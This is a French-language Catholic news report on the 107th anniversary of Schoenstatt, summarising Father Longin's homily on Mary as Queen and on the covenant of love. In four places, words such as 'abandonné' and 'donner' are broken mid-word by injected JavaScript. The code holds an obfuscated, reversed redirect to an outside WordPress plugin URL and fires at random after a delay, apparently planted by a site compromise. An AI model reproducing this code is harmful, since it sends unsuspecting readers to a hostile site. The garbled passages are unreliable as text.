Ce fut le 107eme anniversaire du Schoenstatt quand tomba la date du 18 Octobre 2021, la date où les pèlerins au sanctuaire Marial renouvellent l’Alliance d’amour scellée avec la Vierge Marie. Cet anniversaire a été révélé par le Père Longin tout en entonnant le joyeux anniversaire. En ce jour l’Église commémorait Saint Luc évangéliste et écrivain du livre des actes des Apôtres surnommé « Évangile du Saint Esprit » a-t-il indiqué le Célébrant.
Nous sommes au 107eme anniversaire du Schoenstatt après les années, de génération en génération en commençant par nos ainés dans cet acte de sceller une Alliance avec notre Mère.
« Le serviteur de la Vierge Marie ne se perdra jamais ». Telles sont des paroles que nous trouvons à l’entrée du sanctuaire d’ici á mont Sion. Ces dernières nous rappellent que le serviteur de Marie ne manquera de rien. En effet, elle est la Reine. De ce fait, nous sommes dans ce Royaume d’où toute chose et toute grâce nous seront accordées. Soulignait le père dans son Homélie.
Le Royaume des cieux est n’est plus loin de nous ; il est plutôt avec nous, car nous sommes des enfants de la Reine, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc, les enfants du Roi comme nous le chantons dans le Gloria pendant la célébration eucharistique. C’est Dieu le Roi du ciel et de la terre. Par son immense amour, Il a accordé à l’homme la part de gouverner, ici-bas, sur toute chose. Mais en vain, le Satan s’y est ingéré pour détruire cette relation d’amour qui est entre Dieu et l’homme. Continuait le père Longin.
Dieu n’a pourtant pas abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné l’homme menti par le roi de l’enfer. Il a envoyé plutôt son Fils unique, né d’une femme pour sauver notre humaine condition pécheresse. Son Fils est venu vaincre le Satan en fin que l’homme soit celui qui suit avec honnêteté la volonté de Dieu, le Père.
Au sanctuaire, nous y gagnons la grâce se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner pour l’Évangile. Ce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don d’être évangéliste nous est rappelé aujourd’hui où Jésus envoie 72 disciples devant Lui pour proclamer la bonne nouvelle. Mais dans notre apostolat le diable cherche à nous détourner contre la volonté divine. Mais soyons sans crainte Jésus est avec nous. A-t-il insisté NTIRANYIBAGIRA
Avec la Vierge Marie, offrons, dans la caisse des grâces, nos offrandes comme signe d’obéissance et d’honnêteté pour la volonté de Dieu. A-t-il finalisé.
Dans la joie de fête, l’auguste assemblée a renouvelle l’Alliance d’amour scellée avec la Reine du ciel et de la terre tout en présentant les intentions du cœur. Après la messe a gardé sa continuité comme le prévoie la Liturgie catholique.
NSANZURWIMO Sylvestre